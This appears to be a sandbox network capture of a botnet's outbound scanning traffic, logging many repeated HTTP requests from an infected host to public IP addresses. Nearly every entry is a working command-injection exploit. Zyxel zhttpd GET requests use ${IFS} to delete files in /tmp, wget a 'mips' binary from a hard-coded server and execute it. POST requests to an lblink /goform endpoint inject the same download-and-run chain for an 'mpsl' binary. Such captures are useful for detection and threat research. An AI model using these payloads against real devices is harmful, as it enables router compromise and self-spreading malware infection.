                                        Mar 31, 2024 09:21:08.773493052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4010192.168.2.2353408204.107.116.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.773586988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4011192.168.2.235201457.102.134.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.773673058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4012192.168.2.235789049.20.127.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.773708105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4013192.168.2.235595691.66.183.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.773788929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4014192.168.2.2350720176.161.29.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.773835897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4015192.168.2.2336426176.169.243.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.773931026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4016192.168.2.2343076194.154.40.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.773986101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4017192.168.2.234790632.107.152.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.774072886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4018192.168.2.2350822173.175.53.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:09.748552084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4019192.168.2.2344778205.34.41.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:09.748730898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4020192.168.2.235049451.81.198.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:09.748768091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4021192.168.2.2346828210.43.225.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:09.748801947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4022192.168.2.233732872.141.183.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:09.748846054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4023192.168.2.235317634.43.94.1638080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:10.691173077 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4024192.168.2.2355030180.249.219.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:10.789350986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4025192.168.2.234371441.153.22.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:10.789395094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4026192.168.2.233302673.187.61.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:10.789453983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4027192.168.2.2336398161.221.108.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:10.789504051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4028192.168.2.233880048.202.151.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:10.789541006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4029192.168.2.234812425.154.35.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:10.789585114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4030192.168.2.2346580211.214.215.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:10.789639950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4031192.168.2.2336774167.134.74.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:10.789681911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4032192.168.2.236034837.22.151.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:10.790004969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4033192.168.2.235296224.154.74.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:10.790055990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4034192.168.2.2356808212.3.211.668080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:11.791877985 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:21:15.025271893 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:21:21.168534994 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:21:33.198740005 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:21:57.259349108 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:46.404464006 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4035192.168.2.234635224.8.21.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:11.794118881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4036192.168.2.2332916132.95.222.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:11.794173002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4037192.168.2.235492665.175.139.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:11.794209003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4038192.168.2.2337350155.106.0.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.797303915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4039192.168.2.235590884.42.112.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.797333002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4040192.168.2.235676081.17.237.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.797400951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4041192.168.2.2343314100.15.140.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.797463894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4042192.168.2.2335704157.251.67.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.797506094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4043192.168.2.2351526204.233.252.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.797534943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4044192.168.2.2334590141.55.153.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.797596931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4045192.168.2.235395636.149.76.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.797636986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4046192.168.2.23457201.171.29.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.797684908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4047192.168.2.234168473.113.86.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.797750950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4048192.168.2.23406681.202.131.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.797791004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4049192.168.2.2347672221.173.112.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.797822952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4050192.168.2.2343314207.100.105.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.797872066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4051192.168.2.23375048.82.247.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.797915936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4052192.168.2.2355202147.131.138.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.797944069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4053192.168.2.2349278208.67.103.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.797996044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4054192.168.2.23495125.153.170.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.798047066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4055192.168.2.2346048160.190.237.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.798088074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4056192.168.2.234615844.37.81.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.798125982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4057192.168.2.2349928219.57.230.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:12.798186064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4058192.168.2.235162484.192.189.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.810662985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4059192.168.2.234453485.204.193.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.810702085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4060192.168.2.235896870.241.65.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.810734987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4061192.168.2.233815074.11.170.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.810801029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4062192.168.2.2343398202.146.104.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.810834885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4063192.168.2.2334770184.82.24.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.810878992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4064192.168.2.2348896176.67.251.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.810926914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4065192.168.2.2360960188.229.203.6443
